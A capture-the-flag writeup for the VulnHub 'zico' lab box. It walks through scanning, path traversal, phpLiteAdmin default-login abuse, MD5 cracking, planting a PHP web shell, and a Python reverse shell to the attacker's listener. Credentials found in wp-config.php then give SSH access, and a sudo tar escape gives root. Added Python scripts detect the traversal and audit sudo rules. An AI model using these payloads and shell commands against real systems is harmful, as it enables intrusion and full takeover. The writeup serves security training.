CTF : zico

CTF zico writeup. Source: VulnHub. Announced difficulty level: Intermediate.

Posted by Boula-Bytes on 23 February 2022

Information

  • IP: 192.168.0.188
  • MYIP: 192.168.0.36

First enumeration

Basics

  • NMAP

```console
$ sudo nmap -p- -A 192.168.0.188
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-23 18:12 CET
Nmap scan report for 192.168.0.188
Host is up (0.00012s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
|   2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_  256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Zico's Shop
|_http-server-header: Apache/2.2.22 (Ubuntu)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          34546/udp6  status
|   100024  1          35134/udp   status
|   100024  1          38163/tcp   status
|_  100024  1          56717/tcp6  status
38163/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:59:2C:9A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.12 ms 192.168.0.188

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.94 seconds
```

  • Gobuster

```console
$ gobuster dir -r -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt -u http://192.168.0.188 -x cgi,html,txt,js,php,php.bak,bak,zip,sql,sql.bak,tgz,tar.gz,bkp,tar,rar,id_rsa,log,xml,json,sh,py,pl,rb,csv,pub 2>/dev/null
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.188
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              sql,tgz,bkp,rar,rb,pub,php,sql.bak,tar,txt,php.bak,zip,tar.gz,id_rsa,sh,py,pl,cgi,csv,js,bak,log,xml,json,html
[+] Add Slash:               true
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2022/02/23 18:19:03 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 7970]
/cgi-bin/             (Status: 403) [Size: 289]
/img/                 (Status: 200) [Size: 1106]
/icons/               (Status: 403) [Size: 287]
/tools.html           (Status: 200) [Size: 8355]
/view.php             (Status: 200) [Size: 0]
/view/                (Status: 200) [Size: 0]
/doc/                 (Status: 403) [Size: 285]
/css/                 (Status: 200) [Size: 1118]
/js/                  (Status: 200) [Size: 1118]
/vendor/              (Status: 200) [Size: 1731]
/package.json         (Status: 200) [Size: 789]
/less/                (Status: 200) [Size: 1328]
/server-status/       (Status: 403) [Size: 295]
/dbadmin/             (Status: 200) [Size: 916]
```

Vulnerabilities search

```console
$ curl http://192.168.0.188/view.php?page=../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
ntp:x:103:108::/home/ntp:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
statd:x:105:65534::/var/lib/nfs:/bin/false
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
zico:x:1000:1000:,,,:/home/zico:/bin/bash
```

http://192.168.0.188/dbadmin/test_db.php

-> phpLiteAdmin v1.9.3

```console
$ searchsploit phpliteadmin
------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                       |  Path
------------------------------------------------------------------------------------- ---------------------------------
phpLiteAdmin - 'table' SQL Injection                                                 | php/webapps/38228.txt
phpLiteAdmin 1.1 - Multiple Vulnerabilities                                          | php/webapps/37515.txt
PHPLiteAdmin 1.9.3 - Remote PHP Code Injection                                       | php/webapps/24044.txt
phpLiteAdmin 1.9.6 - Multiple Vulnerabilities                                        | php/webapps/39714.txt
------------------------------------------------------------------------------------- ---------------------------------
```

Here we can use the default password, which is 'admin'.

Once logged in, there is an info table with two users:

root    653F4B285089453FE00E2AAFAC573414    1
zico    96781A607F4E9F5F423AC01F0DAB0EBD    2

Exploit

Let's run these hashes through crackstation.net:

653F4B285089453FE00E2AAFAC573414    md5 34kroot34
96781A607F4E9F5F423AC01F0DAB0EBD    md5 zico2215@

We could try these passwords over SSH, but neither of them works.

So we use the exploit found on Exploit-DB for version 1.9.3:

```console
$ searchsploit -m php/webapps/24044.txt
```

So I create a new database named evil.php, add a table joe with an integer field phil, and insert a new row into that field with this content:

```php
<?php system($_GET["joe"]);?>
```

Now we need to move this file into a directory served by the web server. Go to "Rename Database" and set the new name to a full path:

/var/www/dbadmin/evil.php

On my Kali box I start a pwncat listener:

```console
$ pwncat -l 1234
```

Now we just have to browse to it:

```console
http://192.168.0.188/dbadmin/evil.php?joe=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.36",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

We got a shell :)
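As an added, defender-side example (not part of the original writeup): a small Python scanner over constructed Apache access-log lines that flags the two web-layer issues used above, `../` traversal in the `view.php?page=` parameter (also when URL-encoded or double-encoded) and requests to a PHP file under `/dbadmin/` that is not one of the application's known pages, which is how a database renamed to `evil.php` shows up in the logs. The allowlist of `/dbadmin/` pages is an assumption for this host.

```python
import re
import urllib.parse

# Constructed sample lines in Apache "combined" log format (not from the box).
SAMPLE_LOG = '''\
192.168.0.36 - - [23/Feb/2022:18:25:01 +0100] "GET /view.php?page=../../../../../../../etc/passwd HTTP/1.1" 200 1320 "-" "curl/7.81.0"
192.168.0.36 - - [23/Feb/2022:18:25:09 +0100] "GET /view.php?page=..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1320 "-" "curl/7.81.0"
192.168.0.36 - - [23/Feb/2022:18:40:12 +0100] "GET /dbadmin/evil.php?joe=id HTTP/1.1" 200 55 "-" "Mozilla/5.0"
192.168.0.50 - - [23/Feb/2022:18:41:00 +0100] "GET /tools.html HTTP/1.1" 200 8355 "-" "Mozilla/5.0"
192.168.0.50 - - [23/Feb/2022:18:41:03 +0100] "GET /dbadmin/test_db.php HTTP/1.1" 200 916 "-" "Mozilla/5.0"
'''

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')

# Assumed allowlist of pages that legitimately live under /dbadmin/ on this
# host; any other .php there is unexpected (phpLiteAdmin lets a logged-in user
# rename a database to an arbitrary path, which is how evil.php was created).
KNOWN_DBADMIN = {"/dbadmin/", "/dbadmin/index.php", "/dbadmin/test_db.php"}


def decode_uri(uri):
    """Decode twice so double-encoded sequences like %252e%252e%252f are seen."""
    return urllib.parse.unquote(urllib.parse.unquote(uri))


def classify(line):
    """Return (ip, path, findings) for one log line, or None if unparseable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    uri = decode_uri(m.group("uri"))
    path, _, query = uri.partition("?")
    findings = []
    if TRAVERSAL_RE.search(query):
        findings.append("path-traversal")
    if path.startswith("/dbadmin/") and path.endswith(".php") and path not in KNOWN_DBADMIN:
        findings.append("unexpected-php-in-dbadmin")
    return m.group("ip"), path, findings


def scan(log_text):
    """Return only the lines that produced at least one finding."""
    return [r for r in map(classify, log_text.splitlines()) if r and r[2]]


if __name__ == "__main__":
    for ip, path, findings in scan(SAMPLE_LOG):
        print(ip, path, ", ".join(findings))
```

The second rule is only a signal: the real fix is to keep phpLiteAdmin's database directory outside the web root and to drop the default password, which is what lets the rename happen at all.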

Privilege escalation

```console
$ cat /home/zico/wordpress/wp-config.php
[...]
/** MySQL database username */
define('DB_USER', 'zico');

/** MySQL database password */
define('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');
[...]
```

We can log in via SSH with those creds:

zico:sWfCsfJSPV9H3AmQzw8

Enumeration for privesc

```console
$ sudo -l
Matching Defaults entries for zico on this host:
    env_reset, exempt_group=admin, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User zico may run the following commands on this host:
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /usr/bin/zip
```

Exploit

Check GTFOBins for both binaries. I choose to use tar:

```console
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
```
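Added here as a defender-side complement (not part of the original writeup): a Python audit of `sudo -l` style rules that flags entries for binaries with documented GTFOBins sudo shell escapes when they are granted without fixed arguments, which is exactly the tar and zip situation above. The sample input is constructed, and the list of binaries is a starting point rather than a complete one.

```python
import re

# Constructed sample in the layout printed by `sudo -l`: the first two rules are
# the ones found on the box, the third is added to show a rule that passes.
SUDO_L_OUTPUT = '''\
Matching Defaults entries for zico on this host:
    env_reset, exempt_group=admin, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User zico may run the following commands on this host:
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /usr/bin/zip
    (root) /usr/bin/systemctl restart apache2
'''

# Binaries with documented GTFOBins sudo shell escapes (tar's
# --checkpoint-action=exec=, zip's -T/--unzip-command, editors' :!sh, ...).
SHELL_ESCAPE_BINS = {"tar", "zip", "vim", "vi", "less", "more", "find",
                     "awk", "perl", "python", "env", "bash", "sh"}

# One rule line: "(runas) [TAG: ...] /path/to/cmd [args]"
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:\w+:\s*)*)(?P<cmd>/\S+)(?P<args>.*)$')


def parse_rules(text):
    """Turn sudo -l output into dicts with runas, tags, cmd and args."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        rules.append({"runas": m.group("runas"), "tags": tags,
                      "cmd": m.group("cmd"), "args": m.group("args").strip()})
    return rules


def audit(text):
    """Return (severity, cmd, runas) for every rule that can escape to a shell."""
    findings = []
    for r in parse_rules(text):
        binary = r["cmd"].rsplit("/", 1)[-1]
        # No arguments or a wildcard means the caller picks the arguments, so
        # an escape flag such as --checkpoint-action can be supplied freely.
        unrestricted = r["args"] == "" or "*" in r["args"]
        if binary in SHELL_ESCAPE_BINS and unrestricted:
            sev = "HIGH" if "NOPASSWD" in r["tags"] else "MEDIUM"
            findings.append((sev, r["cmd"], r["runas"]))
    return findings


if __name__ == "__main__":
    for sev, cmd, runas in audit(SUDO_L_OUTPUT):
        print(f"{sev}: {cmd} runnable as {runas} with caller-chosen arguments")
```

The fix on a box like this is to pin the arguments in sudoers (a specific archive and source path) or to replace the rule with a wrapper script that takes no user-controlled options.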

Then...

```console
# cat /root/flag.txt
#
#
#
# ROOOOT!
# You did it! Congratz!
#
# Hope you enjoyed!
#
#
#
#
```

\o/